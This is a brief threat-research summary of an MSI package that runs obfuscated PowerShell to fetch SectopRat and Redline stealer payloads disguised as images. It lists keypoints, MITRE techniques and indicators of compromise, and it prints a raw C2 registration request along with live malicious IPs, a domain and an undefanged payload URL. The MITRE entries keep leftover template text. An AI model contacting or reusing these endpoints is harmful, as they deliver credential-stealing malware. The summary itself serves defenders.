Threat Research

Various Malware Delivered via MSI Package

Securonix

The article analyzes a potentially malicious MSI package that embeds obfuscated PowerShell code, which attempts to contact a C2 server and download additional payloads disguised as JPEG images. It highlights the risks of MSI files and emphasizes downloading software only from trusted sources. #SectopRat #RedlineStealer #CyanBrain #MSI #PowerShell #C2 #JPEGImage

Keypoints

  • The analyzed file is an MSI package containing obfuscated PowerShell code.
  • Custom actions within the MSI can execute PowerShell scripts that perform malicious activities.
  • The initial PowerShell registers with a C2 server and sends system information.
  • Payloads are downloaded from the C2 server and disguised as JPEG images.
  • The first payload belongs to the SectopRat family, followed by a Redline stealer.
  • Persistence is implemented via scheduled tasks that execute the downloaded malware.
  • The article warns against trusting MSI packages and advises downloading software only from safe sources.

MITRE Techniques

  • [T1071] Command and Control – Brief description of how it was used. ‘First, it starts the registration process with the C2: GET /?status=reg&key=bart_23rfs&site=Barto_ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251 Host: filemanaager[.]net Connection: Keep-Alive’
  • [T1059] Execution – Brief description of how it was used. ‘PowerShell scripts are executed to perform malicious actions.’
  • [T1053] Persistence – Brief description of how it was used. ‘Scheduled tasks are created to maintain persistence.’
  • [T1001] Data Obfuscation – Brief description of how it was used. ‘PowerShell code is heavily obfuscated to evade detection.’
  • [T1003] Credential Access – Brief description of how it was used. ‘Redline stealer is used to collect credentials from the victim’s system.’

Indicators of Compromise

  • [File Hash] resources.msi – 69cad2bf6d63dfc93b632cfd91b5182f14b5140da22f9a0ce82c8b459ad76c38
  • [File Hash] SectopRat payload – 7808f3aea222cdbec2e53b126f46195f4523e9501882b94e0cd42e30f8484f32
  • [File Hash] Redline stealer payload – 38c233b38ef1838666ce7204f41349d0ba9431ea4b23fdb05f915cc7a09ff7be
  • [File Name] bart.jpg, Meta.jpg, steam.jpg – first and second payload containers disguised as images
  • [IP] 193.3.19.108 – C2 host used for second-stage payload delivery
  • [IP] 83.97.73.190 – 4819 – second-stage C2 connection
  • [Domain] filemanaager.net – C2 domain observed in requests
  • [URL] http://213.109.202.229:9000/wbinjget?q=6DDE74FFD397B5FB346F9CA050F6095C – initial C2 GET request for payload

Read more: https://isc.sans.edu/diary/rss/31168

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint